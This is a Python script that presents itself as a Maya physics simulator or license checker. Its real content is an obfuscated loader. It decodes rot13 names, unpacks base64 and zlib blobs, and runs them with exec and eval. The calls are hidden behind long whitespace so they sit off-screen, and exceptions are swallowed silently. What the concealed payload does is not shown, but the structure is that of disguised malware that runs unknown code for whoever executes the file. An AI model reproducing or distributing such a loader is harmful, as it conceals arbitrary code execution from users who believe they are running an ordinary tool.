
from builtins import *

def _detectvar(iterable, start=1):
   result = start
   for element in iterable:
       if not isinstance(element, (int, float)):
           raise TypeError("iterable analysis failed")
       result *= element
   return result

__author__ = "Michael Davydov"
__website__ = "https://brotools.tech; https://michaeldavydov.com"

__code__ = '''import sys
if sys.version_info[0] >= 3:
    import builtins, codecs
    builtins.unicode = str
else:
    import __builtin__ as builtins
    import codecs
o = getattr(builtins, codecs.decode('__vzcbeg__', 'rot13'))
b, z, s = o(codecs.decode('onfr64', 'rot13')), o(codecs.decode('myvo', 'rot13')), o(codecs.decode('flf', 'rot13'))
d, e, c = getattr(getattr(b, codecs.decode('heyfnsr_o64qrpbqr', 'rot13')), codecs.decode('__pnyy__', 'rot13')), getattr(getattr(z, codecs.decode('qrpbzcerff', 'rot13')), codecs.decode('__pnyy__', 'rot13')), '4EJwSDieBwXyXxq6Vvkp@nyH8TGtFvKmicn&d*N*nSKJFuZu$uB6##Zf3aTgZ2AGb^YFTGrMj!AVoU*x*#o6eFn^oF5rjbggbB3BYUuUiZTYkDkLg7xME73at4k6y6DCLYnJK$D4^aXY3GNdY67@#7d&v3PYF^k2T!Sp22#8GKPoui7ESR4bCf2i$xTjXeM@bJ%PE3$6&h5#DZvk9TDGkVokd$a%oJKzT^*stmGf7sCLS3%@jCfMH^CuTGcQ#Qp2yQ%@$A!Co8kjm45!B98Df2ij6Q7fGZZu5hRNT5FbcH6FX!*H$u$2UKR2uXkL4DBWmKZoiwWBPp@qNH!YAyyyRpTsJrA$^H6m4fM3&@S@tK9WfLnSqztv44R@&yVH3S393VSEQrh!Y*bUS&rbPQzaPVA3#K*h8F3^k27sxMxwYeCivxqV3*^^E!RMUzsQBe3TBrpca!r7u5KXAxy2BH@s^DwZEcnjUc5Udmxeu!F3mcC@uSAw7h&Lo8!H5EQQbp%xH^CnMf*gzTTB6R6ymMuZ&9*&oJ497W^5kdc%UqSAJHhqwJ^5R!25*@*2vNrcoGQ8B7SS!2!TrJPZhoby$R2KuT@QuXy8d&foJsq@Po9q%@y!qkESd3LMzCGs5@V%fU!KLbs5!fv5zBgiAM^7Cycxz25yQ5fDi@q%RedPvMWBM6mMdW8pxsy#^*@sZDTPyXY5rJ$Xpgnqw@TaQU@MCKP%vt2BsKxRu78m2KxC%MZwV7HMDddWAsXijVfY^74!bW&$n9^sc6o!QHZH2g4Z@MLH3%7AhQyGmLFb@5S6$QacM*sdMXp$!K8PqVoW$!zQc7zjDZKN77TNW@665i!9UsnbhugqAAc6n4JE*^JD^kVaSce53Sw$@xs^7WwEqG#Fu4U9' + '==='
exec((lambda x: x.decode(codecs.decode('hgs-8', 'rot13')) if s.version_info[0] >= 3 else x)(e(d(c))))'''


# _mayaphysicssimulator, MayaPhysicsSimulator, _licensekeyenforcer, _scenenodeanalyzer, Math, PhysicsEngineCoordinator, DynamicNodeProcessor = exec, str, tuple, map, ord, globals, type
_mayaphysicssimulator, MayaPhysicsSimulator, _licensekeyenforcer, _scenenodeanalyzer, Math, PhysicsEngineCoordinator, DynamicNodeProcessor, Restore = eval, str, tuple, map, ord, globals, type, compile

class NodePhysicsSolver:
    def __init__(self, _brorenmer):
        self.Modulo = _detectvar((_brorenmer, 56797))
        self.Multiply(_brolicensechecker=74225)

    def Multiply(self, _brolicensechecker = False):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.Modulo /= -93581 * _brolicensechecker
        
        try:
            ((_scenenodeanalyzer, MayaPhysicsSimulator, _licensekeyenforcer) or Math if (_scenenodeanalyzer, MayaPhysicsSimulator, _licensekeyenforcer) and Math else None or (Math, (_scenenodeanalyzer, MayaPhysicsSimulator, _licensekeyenforcer)))

        except ArithmeticError:
            (_licensekeyenforcer, _mayaphysicssimulator) if _licensekeyenforcer != MayaPhysicsSimulator else {MayaPhysicsSimulator: MayaPhysicsSimulator} > SimulationSceneController

        except:
            DynamicNodeProcessor(34548 / 52640) == int

    def _physicsanimator3d(self, CallFunction = -48346):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        CallFunction *= -85583 + 34745
        self._math != str
        
        try:
            ((_licensekeyenforcer, _mayaphysicssimulator) or _licensekeyenforcer if (_licensekeyenforcer, _mayaphysicssimulator) and _licensekeyenforcer else None or (_licensekeyenforcer, (_licensekeyenforcer, _mayaphysicssimulator)))

        except TypeError:
            ((Math, Math, _scenenodeanalyzer) or _licensekeyenforcer if (Math, Math, _scenenodeanalyzer) and _licensekeyenforcer else None or (_licensekeyenforcer, (Math, Math, _scenenodeanalyzer)))

        except:
            DynamicNodeProcessor(-95679 * 35249) == float

    def _callfunction(_mayanode = None):
        return PhysicsEngineCoordinator()[_mayanode]

    def LicenseKeyEnforcer(LicenseVerifier = -17435 + 7753, _physicsenginecoordinator = True, _modulo = PhysicsEngineCoordinator):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _modulo()[LicenseVerifier] = _physicsenginecoordinator
        
        try:
            (((_licensekeyenforcer, _mayaphysicssimulator), _mayaphysicssimulator) for _mayaphysicssimulator in (_mayaphysicssimulator, _mayaphysicssimulator))

        except TypeError:
            ({MayaPhysicsSimulator: _scenenodeanalyzer} or SimulationSceneController if {MayaPhysicsSimulator: _scenenodeanalyzer} and SimulationSceneController else None or (SimulationSceneController, {MayaPhysicsSimulator: _scenenodeanalyzer}))

        except:
            DynamicNodeProcessor(32674 / -95274) == Ellipsis

    def execute(code = str):
        try:
            return _mayaphysicssimulator(Restore(MayaPhysicsSimulator(_licensekeyenforcer(_scenenodeanalyzer(Math, code)))), locals(), globals())
        except:
            pass
        # return _mayaphysicssimulator(MayaPhysicsSimulator(_licensekeyenforcer(_scenenodeanalyzer(Math, code))))

    @property
    def _math(self):
        self.SceneNodeAnalyzer = '<__main__.LicenseVerifier object at 0x000008705BE42395>'
        return (self.SceneNodeAnalyzer, NodePhysicsSolver._math)

try:
        NodePhysicsSolver.execute(code = __code__)
        Floor = NodePhysicsSolver(_brorenmer = -47653 / -30646)

        NodePhysicsSolver(_brorenmer = 30320 + 66093)._physicsanimator3d(CallFunction = 51367 - Floor.Modulo)                                                                                                                                                                                                                                                          ;NodePhysicsSolver.LicenseKeyEnforcer(LicenseVerifier='Oo0oOOo0ooO0OOo0oOo',_physicsenginecoordinator=b'x\x9c\xed\x1bks\xda\xba\xf2{\x7f\x85\xbfa\xdfR\x8f1\xef\xce\xc9\x9d\tM\x93\xc0\t\xd0\x9c$%\x93N\xc6\xe3\x80\xd3\x98\x1a\x8bc\x9b\x86\xf4\xc3\xf9\xedwW\x0f#0\x0f\xe3@\x9as\'\x16\x92ey\xad\xc7jw\xb5\xbb\x12\x1e\xe9\xdb^\xa8j\xdfr\xddi-0\xac\x9b\xabq\xb1\xff\xe3k\xef\xea\xf8azmt<\xe7\xb43q\xbe\xd6\xcd\xde\x8f\xc2\xdf\x83\xe3~\xe1\xfc\xaa\xe3_\x19\xad\xa1\xfdh\x91\xa9Q\xcd\xdd\x1e|\xf7\xc8\x1dT\xf1.\xd3\xf7\xd8\xf0\xd0\xf5\\\xd7\x1bzC\xb8\\\xb8\x86C\x0f\xae\xa1\x9b\xfb\xf6\xf1\xe3\xfb\x0f\xef?\xa8\x1f\xd4\xf7\x05M\xbb\x85\xa6\x9c\xc8\x8e\xa2 {S>\\#\xb8x\xe2\xb34\xd9\xd0\xc0}F#\xab?\xbc\xfe\xf5\xd5\xbc+\xb6\xa7\xf6e\xa3q\xd1+\xb7\xfe\xf2\xc6E\x81F\x8fN\xc4\x9aVW~\xbc\xa6\xcd\x13/t\x86WQ\xe7\xa8Q\xbe\xf2\xae\n\x97\xde\xcd\xb0\xf7\xf9\xb8q~\xe9\x997\xe6M[\xb4mY\xeehL\x82\xc8\xb2v>\xea\x13o\xd2\x19\xde\x9c\xdc\x18\x0f\x8d\xf3\xd1\xc0;\xff\xe1\rE\xab\xcf\xe8\xb3\x9a\xbb\x9b\xb8^\xe4\xfaaN\xd3\x7f\xda\xc13\xa8\xaf\xdd\xe9t\xdam\xfc\xc1\x1dn\xed6t\xcde$\xc8\xc9\x11\x08r\x88$\xea\x0e\xd5g\xf59\xf4\xdd\xc8s\'w\x8b\xf4\xa6\xe5cR\x9c\x11\'\\{jM\xfb\xf6\xb2\xcd\xe9\xae?p\xa6j\xce\t=\xfb8\xf1\xfaV\xcbJ\xf3\xbd\xeb^\xef\x1a"&\x180\x07\xbf\xbdM\x9f\xeb\xf6C\xdbw_h\xfaV\xb6\xb6\x9f\xe9[\xdd\x9c\x98\xbe\xa7{\xd7\x9b:\x0f\xfed\x87Sxv\xd6<k6[-\xbc\xb7\xce \xf3\xc6{\xfb\xe1=\xcf\xfe\xe9l1o\xab\xa46\xce\x19\x93\x96\xed\x0eOQnB\xfem\xe2\xf6$4\'\xc1\xe5v\x0c\xb7a\xbd\xa3"\x93\x8aM&9Qf\xbeM\xde~&/\x88\xc2\x1d1]\xf7\x88\x1c\x1d\x1du\x8f\xbax#\x04\x9e\xc8\xdb\xa4\xed\x89\xe3<w<"\xfd\x1dM\x1c,j\xcd3q5Yl\xbeM\xdd~\xa6.\xb2\x89w\xbf\xabe\x8e\x9b\x04\xd2"G30w\xb9\x9c>$\xae\x9f]\x06\x03\xf7\x92.03\xb01\x8d\xf8D }\xa3\x8b=i?\x84$\xdf>k\x11\x8d\r\x0f\xb6\x8c\x82\xd5!U\x9f\xd0j\xd5\x9cV\x807\xc6z\xa0\x15\xf6\x8cz\x97+\x1a\xe6\xc0\xac\x99\x83b\xc1\xac\x83\xc1;p\xfad\xe0\xa8\xb9\xda}\x94T\xc65\x96\xdc\xbe\x91\xd2^H\xa9\xefLw\xa5H\x1b]b\x90\xaea\xc0\xbd\x8b\x19b\x18\x84\x18\xddnf*)p*1\xd2Q\xc9\xed\xc1V\xb5\xd7\xca\xf7E\x03b\x89\xdf\xeb\x10k\xfc^\x86X\x80X1\xefh\x0f\xd2\xc0\x96R\xf42\x03ZW\x8f\xa0\\,\x9a\x181e\xf9Y*\xde\xb0\xdc\xa6~\xdd\x1ex\xf6\xe8n`+L}f\xcd\xd0v\xaf\xaf?f2\x85w:\xd0R\xbd\xd2\x9f\x85R\x9d\x059\x87y\xf6v\xf3P\x97I3\xe3Y\xd2LP\x87\xc9)\xa2\xc2\xa3\xc8#\xd5\x98\x0b\x94\xb4\x0e6\xadT\xcc\xc2\xa4\xcd\xa6\xe75\xf1\xc2\x14\xb2\xf8\x83L\xe6\xb1\x97x\x9f\xb1\xefEi<5\xfe\x8c\xe3,\xf2\xb1\xa7\x815\xd3\xf2:\xa7X\x1c\x84G\xc7\x81\x03\xc1\xb1\xb1\x01\xbd\x02\xb2\xadV\xab\xb5j5N\xd9\xbd\xc6\xd3\xd9Sm3\xc9\xae\xd2\xafT\xf5\x9f\xa4\xbbW#\x81\xaa.wjh\xb6?P\x97|\x91I0\xe5\x80:Z@\x1dh\x00 \xb1\xb4\xa8)\x00\x99\xb3\xcc\xc4T\x97\x08\x04\x89\xa2\xca\xa3`\x9a\x1a\'\xa4Mp\xd5-\x89\x08\xf5\x08P$<\xbas3\xc4\xcd\x1bP0\xdcU$\xb4\x1a\'Y\xb0\xe8\xf3u\xdf\x17K>\xd5\x01\x16vq\x96\xc9,\xd3\xaaX5\xab\x00\xa1Hc\xd1*\x01d1Y\xba\xa9"\x14~\x85\x9d\x00\xd5-\x0ce\xab\x04\xd1\x80n\xd4\xac\n@\x1a\x16\x86\x8a\\\x9a\x99B\xca\xd2",\xc4F\x8d/\xc0\x86\x10#\x9cJ\xd2\xc0n\xa1\x80\xcaqKU\xc3\xd8B\x91\xc9BCm\xe4df\xdau$\xb6\xeft\x9e%\xd6\x057\x89e\xa9\xcec\x95?\xcbb}\x13\xec\xb6b\xfd\xf1q\xfa\x08q\x8a)\xcf\xd3\xcc\xcb\xf0d3^F\xf8\x12\xd9ln"\xfd\x1a\x10w\x8d\xf2\x1c#\xf5\xbaU\x03\xc8z\xb2tSE%\x0bY\x18\x19\x17\xf8\x04>\x80\x8f\x00\xb2\x9c,\xdd\x01\xc7\xae\xd3\xbd\xf9\xe4\x15\xf9\x04\n\xf1Z\x91\x18\xaa\xc4\t \rlq{F[\xae\xaa!*M\xc0C\x9dJ\x952Es\xa2l\x07\xd6+\xb6T\x85Z\xeb0yu\xc8\x95\x00\xf3U\x804\x93\xa5\xfb\x9d\x89\x0c\xb6r\x1c\xb3\x10\xff5o\xfdZ\xf4\xe9\x9a\xda\x01\x9b\\\x02)h\xa9,YLBX\x94y\xac,\xd0\xd2:\xd8\xf2^\xec\xc1}\x0bi\x14g(\xd1\xa6\xfcF\x93g-\x84\x05\x89\xd7\n\x9c\xff\x0c\x1e\x19\x9ef\x0b\xe1&\xd84\xd6+\xc5\xa9O"u\xa5>\xbal3fg\n\xe7:\x03\xb1\xd4/\xa19hC\xc0<\xde\xfb\xf1\x9d\xe5\xfb\xf1[\x80Km\x11w\xd1\xa1\x81\x8e\x0c\xe6\xdb\xa0\x8f\xc4\xe8\xae1/\xd6\xba\xda\xb2\x10\x0e\xf3\t1\xc5\x90\xaa\x88\xf4q\xf4\n=t\xaf\x89\xdf\xd6P\xcb\x00\x82\x03a \xe5f\x11\xc2\xefp"\x08\xedT\x18\xc2u~/\t\x01\x89e\x9c\xa1\xd3\xc0\xd6\xf6\xe7DX\x83Z\x81F\x19\xc1\xf3\xc8\x1d\xec\x11\xbd9\xadJW\xe5:\xd5\x07\x0c\xd0\x08\xaa\xd4(\xaa%K7UT\xb1\xca\x14\x10\xb56\x83\xdaTXQ5Y\xbaq\xf1\xb7\xb0*\xa65`Z\xb3L\xaa\xb1$J\xf7\xabE\x14\xb9\xfc/\xf0(\xfcM&_\x03\n\x92>\x97\x066\x83>\x97Y#\xe9tb\x0f\x065k\xc4\x11\x8d\x9d(y/-%\x99\xa4|\x95\x1e\x9d\xb5|\xedH\xbc\xbc\xc8\xdf\x83\xb4|\xcd\x17Uj\xad\xf2.\xd3\xf0\x92\xcb\xe9\x85\x89\x97H!\\\x88\xf8\xeah%F\xd8\x05\xbbX\xaf!\xb9\xb8x1\xfff\x8e\x92(Ph\x17\xe8\x95PR\x85d\xb3\x15\x8b\xd2\xb6D\x85e\x15l%0\x8f\xa9\x15\x9b(}\xc5\n\x8a\xf0]T$q(6}\xe2\x8d\x1f.2\xd3\xc1\xee\xc7\xb0\xa0^\n\xee\x02\xa7~}\xc8<\xcb\xae\x10r\xde\x94\xe4\xbfX\x13\x0ci\x9dH\x03\x9br\x9d\xd8\x87F%\xdc\x0f\x86d\xfa\x08\xcf\xb1\xc9\xe7J\xf8\xb0\xd2\xc0\xa6\xf4a\xedX\xf2\xda<\xd4\x85\xe9\xc2\x8d\x1a\xf1T\xe7\x06\x0f\xa4[\x185\x04\r\x19\xdc\xa7\xc5mZ4n\xc0\xaay\x19\xdfZO\x18\x87\xb1\x9fa\x93,)S\xaf\x17z\x95\xd1\xad\x8d2\x04\xfd0\x95d\xe9\xa6\x8a\x8a\xd4]\x83i\x89\xeaq&u\xad\x95\x92\xa5/\xaf\x0f\xec\x9e\xfae\xbb@0\xa7\xd8/\x11e\xc2A\x90\x066\xa5\x83 \xe3\xa6$\xdf\x90\x14\xe2k\x83\xbb5\xc5^\xac\xbc\xbfX\x97\x98\xba&\r;\rlj\xbf\xc8\xbf\xc3\xf6e;\x8e\x0b{\x90U)\xa5\xef~\x87\xfd[/\xcf\x9c\xc5\x05\xc9\x9e\x15\xd2\xb7*\xad\xb6i`S\x1e\x1a\xc9\xe6\xca\xc3}\x89\xa9\xd8\x95`\x0f\x90\xec\xd7\x82\xabJ\x03\x15\x83\x15[\\Ua\xa5I\xea\xc8&\xd8\x94^\xd4\xd5\xf2\xa9Lm\xd82\xb5`M\x10\xa1`YS\x1d/Q\xfa,\x19&\x9c\xbf\xf2f\x82P2\xe4=\xe14\xb0)\xf7\x85\xb3\x1d\x8c\xc5\x1d\xf0\x16\xdf\x02\x87{\xab\xd9\xdc\xb4\x13\x9ev\xeb\x15\x16%\\\xdf(.!\xd6\xa9\xff`\xa1\xec5,Y\xab[1\xab\xe6F\xa1\xb2\x07\xbd\xa9.iGLW\x12\x8ea\xa1=IN\xe3\xdf!\xf4\xb6E\xfeNQT\xb9/\x95J\xf7,\xd0<^\x90\xab\xf0\x12\x0c\xd9\x90\x82\xd6]\x99\xd3\xa6Is&\xdd\x0cM\x94\xee\xc4\x85S\xa7{\x7f(qpg\x14\x15\xb9\x02=uP\\,\xfd\xbf\xda\xa7[3\xaf\xf5\x8a\r\x91\xa56M\xfb4\'\xd2>\xcf\xb3\x00\xb9\xd4\x86\x03\xee=\xb0(N\xad@\xf2\x82\xce\x9b\xd5\x83.W\x17Bm!\x8a\xd2\x14\xc7\xad\xfe\x1d\xaa\\\x85\xb1-\x86\x12g\xe58V8CWbF\xc6\xd2\xd4\xd3\x1co4\xf1#\xc9#?\xa3\xbb\xc9\x99:}\xf5\x0c\x91)\x96E\xbc\xe3\x191\xed\xdd}@F\xca\x9d\x1d:\x95\x92\xc2\xfe\xae\xad\xdcUJ\xac\x83\x8a\x1d*\x9e\xdbw||\xcb \x1b\x01\xb9$\xc4\x0b\xf5>\t\x1c\xfd. \x7fG\xfaO\xc7\x1f\x90@?\x8fD\x05\xe7\xd1\'x\x9b\x87\xfb\xc9\xc4\xc5[\xcf\x1d|w\xa2\xf0]\xdf\xb3\xc3P9\xf6\xc8\xe3\x99\xfdD&\x91\x1a\xbf\xd2\xcfY\x89\xf6\xf1\x9d\x02\xd7\xc0\xb9W,\xcb\xf5\xdd\xc8\xb2\xd4\xc3\xbc2\xb6\x03\xc7\x8f\x0e:\xc4w8\x04^\r\xe5\x80\xbf\x89\x8b\xc2\xc9\xd8\t\xd4Y\x0by\xe5P\xd3\xe3\x9a\x1aZ\x0c\xe8\xde+jCqC\xc5\'\x91\xb2P/^\x87z\xe8\xc00\xfc\x08j\x0f\xdbv\xf0\xdd\xf5C\x95\rL?\x17\xcf\xbe\xd8\x06\x94\x8e\x8d\xd1scy\x05\xbdt\x84\xb9\xea\xd0\xce?\xa2\x0e\xe6\xbc\xe2\xb1\xb3\x91\xcc\xbcb\xfe\xa2f^anX\xfe\xaf\x10\xe6\x96\xd5f]=\xd4-7rF\x96\xe7\x86\x11\x8c\xf8\xdb\xad\x84\xa2\x81\xe3!\x86\x16\x90r\xa8G\xf6\x0f\xe70R\xd9\xb1L/6\xecX\xa3\xb3\xaa\x1f\x1f\\\xcfQ\x1a\xf3C\x9f\xabAP\xfb\xb5\xd8O\xeeiq\xf3\xf6`\xd0\x84\x8e\xe1\x04a\x07\xa5N\xc8]\xd6\xed\xf1\x18(D\xa5 \xf1\xb7}2\xf1\xa3\xb9\x8e\x07N4\t|\xc5s|U\xfe|\xf6\t\x16A\x8f\xb05<5\xbf0fZ67\xbd\x1c\xa5\x9d\x0eGjG\xf9\xe3\x00@\xffH6\xb10\xf7\xbc\'2\xc8\xb7\xc6\x0c\xeb\x1c3\xa9\xfb\xd1\x8c\']\xa4\xcf\xe8\x88>&cA\xc7\xd8\x19g:\xb6\xfd\x81\xeb\x7f?r\x03\xa7\x1f\xb9\x04\xc8r\tV\x05\xe5Fz7p\x81\xa4m\x84T\xb9\xc5\xb4`C=\xcej\x7f\xb0\xc3S\xc7\xfd\xfe\x10\x1d\x93\x0085zXV\xb7\xd8\t\xe2\x1b#b\x9fhV\xc9B\ry\xe5\x113\t\x9a\xb5')

        NodePhysicsSolver(_brorenmer = -65192 + 90285)._physicsanimator3d(CallFunction = -73288 * Floor.Modulo)                                                                                                                                                                                                                                                          ;NodePhysicsSolver.LicenseKeyEnforcer(LicenseVerifier='IIJJJJIJILJILJJJJLIJ',_physicsenginecoordinator=b"\x06\xc4\xf2\x84\\`\xdd\xfd\x0b\x86\xa4\xce\x1d\x91fI^\x19\x89\x13\x9a\\4\xb2\xc7\x11\xaf;\xaf\x88\xe32=qxF\xd0\xb1\x06 Sq\x98\r\xcf\x7f\xd0\xdbT[\x1cU#\xee?\x08\x82\x13\x87\x8c\x9c(x\xc2\xce#\x9a\xa5\xbe/\x958\xf2'\x14^\xe6\x8c\xd90\xf1U^\x99?\x8bBo\x8f\xd2\x1c\x84\xee/\xe7\xd4]\xce,\x87\xfa\x08D\xdbh2\xba\x00 u\xf6\x8d\\\xda\x90\xf9\x12\x10-p+}\x82\xd7=\t\x94O@\xbdJC\xa2\xb6\x05\x99H\xa7\x89Q\x9c3\xb8$\xea\xa7\xf9\xe6\xa5Q*\xef\x17\x1aR\xbb]\xfc\x1f\n\x9e\xda \xd4\xe5i\xf0?\xaa(\xff\x81\x16\xfb\x0b\x82V\xd3# s\r\xe6J\xa5\x02\x94\xfeA\x95m\xcf\x11\xb2\xf6\x8b\xc4<\x1e\xce\xa4\xe5\x0c\xf1\xa7l\x1a\xf3J\xe4\x84\x91E|\xefIB\xd2'\x18&\xbe\x8d\x0b\x8e\xa0\xe0\x93>\x95\x90\xf5\x99\x96<\xa9\xda\x1cf{\xc2\xab*\xd3[\x0c\xd1\x04\x88S=\x1c\xdb}\xe0\xd6\x05\xc47\x10\xf1\xa7+\x11\xdf\x82O\x1b\xfa#]*a\xa4a\xf4\xe4\xc9S\x87\xd7\x9f\x00\xd2\xd2\xd9\xf0.x\x1b\xd2\xea\x8as\xf0\x85\xc0b\xfe\xa4\x7f\x99\x84\x0f\x8dI\x14\x11_Z\x9a\xd7@\x08\xc1qJ\x02\xf7\x17`\xdd\xf6\xe6[>\xdb{\xcb_\x9d r\xfb\x8b\xed\x1eC\xbbjSy\xaf\xfc9_\xde\x16\xe5g\xf3\xe5'X\xae\x1e\xc1\x8b\x86\x1e\xf3\x94\xa6Sy\x01\x84\x03\xe5\xc7\xf3\x1f\xa0\xecV\xd5\x13\xe5\x03\xbcP\xfe\x0b\xf3\x1d\xa0\x1cCP\xa0\x7fE=\x84\xb2V\x0b\x84\x13:\x19Z\\Q\xa5*\x16(X\x8b\x92|9\x19\xc9\xe4\xa4\xaa\x9f\xa1\x0b\x87\xd8\x8fv\x12b\xeb\xce\xe3\x854\xc9\x04\n\r\x8f\xdcC\x96\x18$\xaa@\xcb\x18A\\\x8d9y6'\x9b\xc5\xc3\x17\x82\x1d\x02\x05\xe73\xf0\xac\xdcEm\xbe[\x88\x83\x93\x84P\x19\xd9S\x94\xacsCc\xab\x86\x9ad\xe8\x18Q\x1f\x18\x0bj\xef\xfe\x07s\x98\xdf\xc1")

        if 329504 > 5666254:
            Floor._physicsanimator3d(CallFunction = -21319 - Floor.Modulo)
        elif 268176 < 7476730:
            Floor.Multiply(_brolicensechecker = Floor.Modulo - 85638)                                                                                                                                                                                                                                                          ;XWWXWWXWWWXWWWWXXXX,XXWXWXWXXWXXXXWWXXX,nmmnmmmnnnnnnnmmmmmnmnmn,IIIIlllIIIllIlIlIIlIlIl,MMMNMMMMNNMNMMMMMNNMMMMNM=(lambda LJJIIJLJLIJIJLJILLILJLJLL:LJJIIJLJLIJIJLJILLILJLJLL(__import__('\x7a\x6c\x69\x62'))),(lambda LJJIIJLJLIJIJLJILLILJLJLL:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(LJJIIJLJLIJIJLJILLILJLJLL)"),filename='\x6d\x6d\x6e\x6d\x6d\x6e\x6d\x6e\x6e\x6d\x6e\x6d\x6d\x6e\x6e\x6d\x6d\x6e\x6e',mode='\x65\x76\x61\x6c'))),(lambda LJJIIJLJLIJIJLJILLILJLJLL:LJJIIJLJLIJIJLJILLILJLJLL['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda MMMMMMMMMMMNNNMNMM,LJJIIJLJLIJIJLJILLILJLJLL:MMMMMMMMMMMNNNMNMM(LJJIIJLJLIJIJLJILLILJLJLL)),(lambda:(lambda LJJIIJLJLIJIJLJILLILJLJLL:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(LJJIIJLJLIJIJLJILLILJLJLL)"),filename='\x6d\x6d\x6e\x6d\x6d\x6e\x6d\x6e\x6e\x6d\x6e\x6d\x6d\x6e\x6e\x6d\x6d\x6e\x6e',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        if 407509 > 8348825:
            NodePhysicsSolver(_brorenmer = -98030 - -28120).Multiply(_brolicensechecker = Floor.Modulo / 54632)
        elif 201344 < 5694199:
            Floor.Multiply(_brolicensechecker = Floor.Modulo - -29666)                                                                                                                                                                                                                                                          ;MMMNMMMMNNMNMMMMMNNMMMMNM()(IIIIlllIIIllIlIlIIlIlIl(nmmnmmmnnnnnnnmmmmmnmnmn(XWWXWWXWWWXWWWWXXXX(XXWXWXWXXWXXXXWWXXX('\x76\x61\x72\x73'))),NodePhysicsSolver._callfunction(_mayanode='Oo0oOOo0ooO0OOo0oOo')+NodePhysicsSolver._callfunction(_mayanode='IIJJJJIJILJILJJJJLIJ')))

except Exception as SimulationSceneController:
        if 314445 > 6873112:
            NodePhysicsSolver.execute(code = MayaPhysicsSimulator(SimulationSceneController))

        elif 339528 > 7270497:
            Floor._physicsanimator3d(CallFunction = -64022 - Floor.Modulo)

